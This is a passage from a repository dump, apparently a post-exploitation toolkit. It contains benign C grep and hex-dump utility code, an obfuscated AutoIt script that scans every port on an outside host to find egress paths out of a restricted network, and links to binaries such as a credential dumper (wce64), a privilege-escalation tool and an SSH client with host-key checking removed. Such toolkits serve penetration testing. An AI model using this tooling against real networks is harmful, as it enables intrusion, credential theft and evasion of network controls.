249 | if((o - output) >= maxchars) break;
250 | }
251 | if(*p == '\\') {
252 | p++;
253 | switch(*p) {
254 | case 0: return(-1); break;
255 | //case '0': n = '\0'; break;
256 | case 'a': n = '\a'; break;
257 | case 'b': n = '\b'; break;
258 | case 'e': n = '\e'; break;
259 | case 'f': n = '\f'; break;
260 | case 'n': n = '\n'; break;
261 | case 'r': n = '\r'; break;
262 | case 't': n = '\t'; break;
263 | case 'v': n = '\v'; break;
264 | case '\"': n = '\"'; break;
265 | case '\'': n = '\''; break;
266 | case '\\': n = '\\'; break;
267 | case '?': n = '\?'; break;
268 | case '.': n = '.'; break;
269 | case ' ': n = ' '; break;
270 | case 'x': {
271 | //n = readbase(p + 1, 16, &len);
272 | //if(len <= 0) return(-1);
273 | if(sscanf(p + 1, "%02x%n", &n, &len) != 1) return(-1);
274 | if(len > 2) len = 2;
275 | p += len;
276 | } break;
277 | default: {
278 | //n = readbase(p, 8, &len);
279 | //if(len <= 0) return(-1);
280 | if(sscanf(p, "%3o%n", &n, &len) != 1) return(-1);
281 | if(len > 3) len = 3;
282 | p += (len - 1); // work-around for the subsequent p++;
283 | } break;
284 | }
285 | *o++ = n;
286 | } else {
287 | *o++ = *p;
288 | }
289 | p++;
290 | }
291 | *o = 0;
292 | len = o - output;
293 | if(inlen) *inlen = p - input;
294 | return(len);
295 | }
296 |
297 |
298 |
299 | u8 *byte2hex(u8 *data, int *size) {
300 | int i,
301 | len;
302 | u8 *ret = NULL;
303 |
304 | if(!data) data = "";
305 | if(size) len = *size;
306 | else len = strlen(data);
307 |
308 | ret = malloc((len * 2) + 1);
309 | if(!ret) std_err();
310 | for(i = 0; i < len; i++) {
311 | sprintf(ret + (i * 2), "%02x", data[i]);
312 | }
313 | if(size) *size = strlen(ret);
314 | return(ret);
315 | }
316 |
317 |
318 |
319 | u8 *base64_encode(u8 *data, int *size) {
320 | int len,
321 | a,
322 | b,
323 | c;
324 | u8 *buff,
325 | *p;
326 | static const u8 base[64] = {
327 | 'A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P',
328 | 'Q','R','S','T','U','V','W','X','Y','Z','a','b','c','d','e','f',
329 | 'g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v',
330 | 'w','x','y','z','0','1','2','3','4','5','6','7','8','9','+','/'
331 | };
332 |
333 | if(!size || (*size < 0)) { // use size -1 for auto text size!
334 | len = strlen(data);
335 | } else {
336 | len = *size;
337 | }
338 | buff = malloc(((len / 3) << 2) + 6);
339 | if(!buff) return(NULL);
340 |
341 | p = buff;
342 | do {
343 | a = data[0];
344 | b = data[1];
345 | c = data[2];
346 | *p++ = base[(a >> 2) & 63];
347 | *p++ = base[(((a & 3) << 4) | ((b >> 4) & 15)) & 63];
348 | *p++ = base[(((b & 15) << 2) | ((c >> 6) & 3)) & 63];
349 | *p++ = base[c & 63];
350 | data += 3;
351 | len -= 3;
352 | } while(len > 0);
353 | for(*p = 0; len < 0; len++) *(p + len) = '=';
354 |
355 | if(size) *size = p - buff;
356 | return(buff);
357 | }
358 |
359 |
360 |
361 | int find(u8 *fname, u8 *buff, int buffsz, u8 *string, int stringsz, int adiacent, int case_sensitive) {
362 | int i,
363 | x,
364 | res,
365 | found = 0;
366 | u8 *p,
367 | *l,
368 | *s;
369 |
370 | if(verbose) {
371 | fputc('\n', stdout);
372 | show_dump(string, stringsz, stdout);
373 | fputc('\n', stdout);
374 | }
375 |
376 | l = buff + (buffsz - stringsz);
377 |
378 | if(adiacent) {
379 | for(p = buff; p <= l; p++) {
380 | if(p[0] != string[0]) continue;
381 | s = p;
382 | for(i = 0; i < stringsz; i++) {
383 | if(adiacent < 0) {
384 | if((s + adiacent) < buff) break;
385 | if((s - adiacent) >= l) break;
386 | for(x = 0; x < -adiacent; x++) {
387 | if((s[x]) == string[i]) {
388 | s += x;
389 | break;
390 | }
391 | if((s[-x]) == string[i]) break;
392 | }
393 | if(x >= -adiacent) break;
394 | } else {
395 | for(x = 0; x < adiacent; x++) {
396 | if((*s++) == string[i]) break;
397 | }
398 | if(x >= adiacent) break;
399 | }
400 | }
401 | if(i >= stringsz) {
402 | printf(" %08x %s\n", p - buff, fname);
403 | found++;
404 | if(adiacent < 0) p = s;
405 | }
406 | }
407 | } else {
408 | for(p = buff; p <= l; p++) {
409 | if(case_sensitive) {
410 | res = memcmp(p, string, stringsz);
411 | } else {
412 | res = mymemicmp(p, string, stringsz);
413 | }
414 | if(!res) {
415 | printf(" %08x %s\n", p - buff, fname);
416 | found++;
417 | }
418 | }
419 | }
420 | return(found);
421 | }
422 |
423 |
424 |
425 | int mymemicmp(u8 *a, u8 *b, int len) {
426 | int i;
427 |
428 | for(i = 0; i < len; i++) {
429 | if(tolower(a[i]) != tolower(b[i])) return(-1);
430 | }
431 | return(0);
432 | }
433 |
434 |
435 |
436 | u8 *fdload(u8 *fname, int *fsize) {
437 | struct stat xstat;
438 | FILE *fd;
439 | int size;
440 | u8 *buff;
441 |
442 | if(!fname) return(NULL);
443 | if(verbose) fprintf(stdout, "\n- %s\n", fname);
444 | fd = fopen(fname, "rb");
445 | if(!fd) return(NULL);
446 | fstat(fileno(fd), &xstat);
447 | size = xstat.st_size;
448 | if(size == -1) size = -2; // lame, impossible case
449 | buff = malloc(size + 1);
450 | if(buff) {
451 | fread(buff, 1, size, fd);
452 | buff[size] = 0;
453 | } else {
454 | size = 0;
455 | }
456 | fclose(fd);
457 | if(fsize) *fsize = size;
458 | if(verbose) fprintf(stdout, "- %u bytes loaded\n", size);
459 | return(buff);
460 | }
461 |
462 |
463 |
464 | void std_err(void) {
465 | perror("\nError");
466 | exit(1);
467 | }
468 |
469 |
--------------------------------------------------------------------------------
/win32bins/mygrep/mygrep.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/mygrep/mygrep.exe
--------------------------------------------------------------------------------
/win32bins/mygrep/scan.h:
--------------------------------------------------------------------------------
1 | /*
2 | Copyright 2012 Luigi Auriemma
3 |
4 | This program is free software; you can redistribute it and/or modify
5 | it under the terms of the GNU General Public License as published by
6 | the Free Software Foundation; either version 2 of the License, or
7 | (at your option) any later version.
8 |
9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
12 | GNU General Public License for more details.
13 |
14 | You should have received a copy of the GNU General Public License
15 | along with this program; if not, write to the Free Software
16 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
17 |
18 | http://www.gnu.org/licenses/gpl-2.0.txt
19 | */
20 |
21 |
22 |
23 | typedef struct {
24 | u8 *name;
25 | //int offset; // unused at the moment
26 | int size;
27 | } files_t;
28 | u8 *filter_in_files = NULL;
29 |
30 |
31 |
32 | int check_wildcard(u8 *fname, u8 *wildcard) {
33 | u8 *f,
34 | *w,
35 | *a;
36 |
37 | if(!fname) return(-1);
38 | if(!wildcard) return(-1);
39 | f = fname;
40 | w = wildcard;
41 | a = NULL;
42 | while(*f || *w) {
43 | if(!*w && !a) return(-1);
44 | if(*w == '?') {
45 | if(!*f) break;
46 | w++;
47 | f++;
48 | } else if(*w == '*') {
49 | w++;
50 | a = w;
51 | } else {
52 | if(!*f) break;
53 | if(tolower(*f) != tolower(*w)) {
54 | if(!a) return(-1);
55 | f++;
56 | w = a;
57 | } else {
58 | f++;
59 | w++;
60 | }
61 | }
62 | }
63 | if(*f || *w) return(-1);
64 | return(0);
65 | }
66 |
67 |
68 |
69 | files_t *add_files(u8 *fname, int fsize, int *ret_files) {
70 | static int filesi = 0,
71 | filesn = 0;
72 | static files_t *files = NULL;
73 | files_t *ret;
74 |
75 | if(ret_files) {
76 | *ret_files = filesi;
77 | files = realloc(files, sizeof(files_t) * (filesi + 1)); // not needed, but it's ok
78 | if(!files) std_err();
79 | files[filesi].name = NULL;
80 | //files[filesi].offset = 0;
81 | files[filesi].size = 0;
82 | ret = files;
83 | filesi = 0;
84 | filesn = 0;
85 | files = NULL;
86 | return(ret);
87 | }
88 |
89 | if(!fname) return(NULL);
90 | if(filter_in_files && (check_wildcard(fname, filter_in_files) < 0)) return(NULL);
91 |
92 | if(filesi >= filesn) {
93 | filesn += 1024;
94 | files = realloc(files, sizeof(files_t) * filesn);
95 | if(!files) std_err();
96 | }
97 | files[filesi].name = strdup(fname);
98 | //files[filesi].offset = 0;
99 | files[filesi].size = fsize;
100 | filesi++;
101 | return(NULL);
102 | }
103 |
104 |
105 |
106 | #define recursive_dir_skip_path 0
107 | //#define recursive_dir_skip_path 2
108 | int recursive_dir(u8 *filedir, int filedirsz) {
109 | int plen,
110 | namelen,
111 | ret = -1;
112 |
113 | if(!filedir) return(ret);
114 | #ifdef WIN32
115 | static int winnt = -1;
116 | OSVERSIONINFO osver;
117 | WIN32_FIND_DATA wfd;
118 | HANDLE hFind = INVALID_HANDLE_VALUE;
119 |
120 | if(winnt < 0) {
121 | osver.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);
122 | GetVersionEx(&osver);
123 | if(osver.dwPlatformId >= VER_PLATFORM_WIN32_NT) {
124 | winnt = 1;
125 | } else {
126 | winnt = 0;
127 | }
128 | }
129 |
130 | plen = strlen(filedir);
131 | if((plen + 4) >= filedirsz) goto quit;
132 | strcpy(filedir + plen, "\\*.*");
133 | plen++;
134 |
135 | if(winnt) { // required to avoid problems with Vista and Windows7!
136 | hFind = FindFirstFileEx(filedir, FindExInfoStandard, &wfd, FindExSearchNameMatch, NULL, 0);
137 | } else {
138 | hFind = FindFirstFile(filedir, &wfd);
139 | }
140 | if(hFind == INVALID_HANDLE_VALUE) goto quit;
141 | do {
142 | if(!strcmp(wfd.cFileName, ".") || !strcmp(wfd.cFileName, "..")) continue;
143 |
144 | namelen = strlen(wfd.cFileName);
145 | if((plen + namelen) >= filedirsz) goto quit;
146 | //strcpy(filedir + plen, wfd.cFileName);
147 | memcpy(filedir + plen, wfd.cFileName, namelen);
148 | filedir[plen + namelen] = 0;
149 |
150 | if(wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
151 | if(recursive_dir(filedir, filedirsz) < 0) goto quit;
152 | } else {
153 | add_files(filedir + recursive_dir_skip_path, wfd.nFileSizeLow, NULL);
154 | }
155 | } while(FindNextFile(hFind, &wfd));
156 | ret = 0;
157 |
158 | quit:
159 | if(hFind != INVALID_HANDLE_VALUE) FindClose(hFind);
160 | #else
161 | struct stat xstat;
162 | struct dirent **namelist;
163 | int n,
164 | i;
165 |
166 | n = scandir(filedir, &namelist, NULL, NULL);
167 | if(n < 0) {
168 | if(stat(filedir, &xstat) < 0) {
169 | fprintf(stderr, "**** %s", filedir);
170 | std_err();
171 | }
172 | add_files(filedir + recursive_dir_skip_path, xstat.st_size, NULL);
173 | return(0);
174 | }
175 |
176 | plen = strlen(filedir);
177 | if((plen + 1) >= filedirsz) goto quit;
178 | strcpy(filedir + plen, "/");
179 | plen++;
180 |
181 | for(i = 0; i < n; i++) {
182 | if(!strcmp(namelist[i]->d_name, ".") || !strcmp(namelist[i]->d_name, "..")) continue;
183 |
184 | namelen = strlen(namelist[i]->d_name);
185 | if((plen + namelen) >= filedirsz) goto quit;
186 | //strcpy(filedir + plen, namelist[i]->d_name);
187 | memcpy(filedir + plen, namelist[i]->d_name, namelen);
188 | filedir[plen + namelen] = 0;
189 |
190 | if(stat(filedir, &xstat) < 0) {
191 | fprintf(stderr, "**** %s", filedir);
192 | std_err();
193 | }
194 | if(S_ISDIR(xstat.st_mode)) {
195 | if(recursive_dir(filedir, filedirsz) < 0) goto quit;
196 | } else {
197 | add_files(filedir + recursive_dir_skip_path, xstat.st_size, NULL);
198 | }
199 | free(namelist[i]);
200 | }
201 | ret = 0;
202 |
203 | quit:
204 | for(; i < n; i++) free(namelist[i]);
205 | free(namelist);
206 | #endif
207 | filedir[plen - 1] = 0;
208 | return(ret);
209 | }
210 |
211 |
--------------------------------------------------------------------------------
/win32bins/mygrep/show_dump.h:
--------------------------------------------------------------------------------
1 | /*
2 | Show_dump 0.1.1a
3 |
4 | Copyright 2004,2005,2006 Luigi Auriemma
5 |
6 | This program is free software; you can redistribute it and/or modify
7 | it under the terms of the GNU General Public License as published by
8 | the Free Software Foundation; either version 2 of the License, or
9 | (at your option) any later version.
10 |
11 | This program is distributed in the hope that it will be useful,
12 | but WITHOUT ANY WARRANTY; without even the implied warranty of
13 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 | GNU General Public License for more details.
15 |
16 | You should have received a copy of the GNU General Public License
17 | along with this program; if not, write to the Free Software
18 | Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
19 |
20 | http://www.gnu.org/licenses/gpl.txt
21 |
22 | This function, optimized for performace, shows the hex dump of a buffer and
23 | places it in a stream
24 |
25 | Usage:
26 | show_dump(buffer, buffer_length, stdout);
27 | show_dump(buffer, buffer_length, fd);
28 | */
29 |
30 | #include
31 |
32 |
33 |
34 | void show_dump(unsigned char *data, unsigned int len, FILE *stream) {
35 | static const char hex[] = "0123456789abcdef";
36 | static unsigned char buff[67]; /* HEX CHAR\n */
37 | unsigned char chr,
38 | *bytes,
39 | *p,
40 | *limit,
41 | *glimit = data + len;
42 |
43 | memset(buff + 2, ' ', 48);
44 |
45 | while(data < glimit) {
46 | limit = data + 16;
47 | if(limit > glimit) {
48 | limit = glimit;
49 | memset(buff, ' ', 48);
50 | }
51 |
52 | p = buff;
53 | bytes = p + 50;
54 | while(data < limit) {
55 | chr = *data;
56 | *p++ = hex[chr >> 4];
57 | *p++ = hex[chr & 15];
58 | p++;
59 | *bytes++ = ((chr < ' ') || (chr >= 0x7f)) ? '.' : chr;
60 | data++;
61 | }
62 | *bytes++ = '\n';
63 |
64 | fwrite(buff, bytes - buff, 1, stream);
65 | }
66 | }
67 |
68 |
--------------------------------------------------------------------------------
/win32bins/network/letmeoutofyournet/w00tw00t_incremental.au3:
--------------------------------------------------------------------------------
1 | #NoTrayIcon
2 | #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
3 | #AutoIt3Wrapper_UseUpx=n
4 | #AutoIt3Wrapper_Change2CUI=y
5 | #AutoIt3Wrapper_Run_Obfuscator=y
6 | #Obfuscator_Parameters=/cs 1 /cn 1
7 | #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
8 | #include
9 |
10 | TCPStartup()
11 | $ip = TCPNameToIp('backup.letmeoutofyour.net')
12 | ConsoleWrite("letmeoutofyour.net resolved to: " & $ip & @CRLF)
13 | $realip = '178.79.164.226'
14 | If($ip == $realip) Then
15 | ConsoleWrite("Correctly resolved letmeoutofyour.net, checking ports..." & @CRLF)
16 | For $i = 0 to 65535
17 | Local $sData = InetRead("http://old.letmeoutofyour.net:" & $i & "/test")
18 | If BinaryToString($sData) == 'w00tw00t' & @LF Then
19 | ConsoleWrite("Good on port: " & $i & @CRLF)
20 | EndIf
21 | Next
22 | Else
23 | ConsoleWrite("Couldn't resolve letmeoutofyour.net, using direct IP..." & @CRLF)
24 | For $i = 0 to 65535
25 | Local $sData = InetRead("http://178.79.164.226:" & $i & "/test")
26 | If BinaryToString($sData) == 'w00tw00t' & @LF Then
27 | ConsoleWrite("Good on port: " & $i & @CRLF)
28 | EndIf
29 | Next
30 | EndIf
31 |
32 |
--------------------------------------------------------------------------------
/win32bins/network/letmeoutofyournet/w00tw00t_incremental.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/letmeoutofyournet/w00tw00t_incremental.exe
--------------------------------------------------------------------------------
/win32bins/network/ncat.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/ncat.exe
--------------------------------------------------------------------------------
/win32bins/network/plink.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/plink.exe
--------------------------------------------------------------------------------
/win32bins/network/plink_novrfy.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/plink_novrfy.exe
--------------------------------------------------------------------------------
/win32bins/network/readme.creole:
--------------------------------------------------------------------------------
1 | plink.exe - standard plink from putty site
2 | plink_novrfy.exe - compiled binary to not verify SSH signature key
--------------------------------------------------------------------------------
/win32bins/network/remote.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/remote.exe
--------------------------------------------------------------------------------
/win32bins/network/sbd.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/sbd.exe
--------------------------------------------------------------------------------
/win32bins/network/showmount.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/showmount.exe
--------------------------------------------------------------------------------
/win32bins/network/tcping.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/tcping.exe
--------------------------------------------------------------------------------
/win32bins/network/wget.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/wget.exe
--------------------------------------------------------------------------------
/win32bins/network/zebedee.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/network/zebedee.exe
--------------------------------------------------------------------------------
/win32bins/ntrights.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/ntrights.exe
--------------------------------------------------------------------------------
/win32bins/privesc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/privesc.exe
--------------------------------------------------------------------------------
/win32bins/psexec.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/psexec.exe
--------------------------------------------------------------------------------
/win32bins/rawcap.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/rawcap.exe
--------------------------------------------------------------------------------
/win32bins/regedit_nogpo.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/regedit_nogpo.exe
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/cygcrypto-0.9.8.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/cygcrypto-0.9.8.dll
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/cyggcc_s-1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/cyggcc_s-1.dll
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/cygminires.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/cygminires.dll
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/cygssp-0.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/cygssp-0.dll
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/cygwin1.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/cygwin1.dll
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/cygz.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/cygz.dll
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/scp.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/scp.exe
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/ssh-agent.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/ssh-agent.exe
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/ssh-keygen.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/ssh-keygen.exe
--------------------------------------------------------------------------------
/win32bins/requires_cygwin/ssh.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win32bins/requires_cygwin/ssh.exe
--------------------------------------------------------------------------------
/win64bins/bitsadmin64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win64bins/bitsadmin64.exe
--------------------------------------------------------------------------------
/win64bins/dsacls.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win64bins/dsacls.exe
--------------------------------------------------------------------------------
/win64bins/en-US/dsacls.exe.mui:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win64bins/en-US/dsacls.exe.mui
--------------------------------------------------------------------------------
/win64bins/nltest64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win64bins/nltest64.exe
--------------------------------------------------------------------------------
/win64bins/runhash64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win64bins/runhash64.exe
--------------------------------------------------------------------------------
/win64bins/showmount.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win64bins/showmount.exe
--------------------------------------------------------------------------------
/win64bins/wce64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/mubix/post-exploitation/850e90d938f00b55ab5efee08b686f1295799fa9/win64bins/wce64.exe
--------------------------------------------------------------------------------